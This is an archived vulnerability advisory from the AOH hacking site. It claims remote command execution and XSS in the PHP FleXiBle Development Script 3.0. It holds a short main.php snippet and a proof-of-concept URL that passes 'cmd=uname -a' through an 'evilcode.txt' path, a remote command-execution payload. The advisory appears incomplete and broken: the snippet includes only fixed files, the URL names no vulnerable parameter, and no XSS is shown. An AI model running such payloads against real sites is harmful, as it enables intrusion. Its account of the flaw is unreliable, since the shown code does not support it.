AOH :: HP Unsorted F :: B06-1339.HTM

Flexible development script remote command exucetion and xss attacking



FleXiBle Development Script Remote Command Exucetion And XSS Attacking
FleXiBle Development Script Remote Command Exucetion And XSS Attacking



Description : 

/* ================================================= 
File created by Andries Bruinsma 
(c) FleXiBle Development (FXB) 
Web: http://www.ahbruinsma.nl 
Email: renegade@clanflex.com 
=================================================== 
File: main.php 
Version: 3.0 
Date started: 10th May, 2004 
Last modified : 24th January, 2006 
Last Update: New layout 

================================================
Vulnerable 

ob_start(ob_gzhandler); 
//Defining some functions and including them 
require('php/messages.php'); 
//require base-file 
//require_once('php/base.php'); 
include_once "baseconfig.inc.php"; 


http://www.site.com/[path]/evilcode.txt?&cmd=uname -a 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.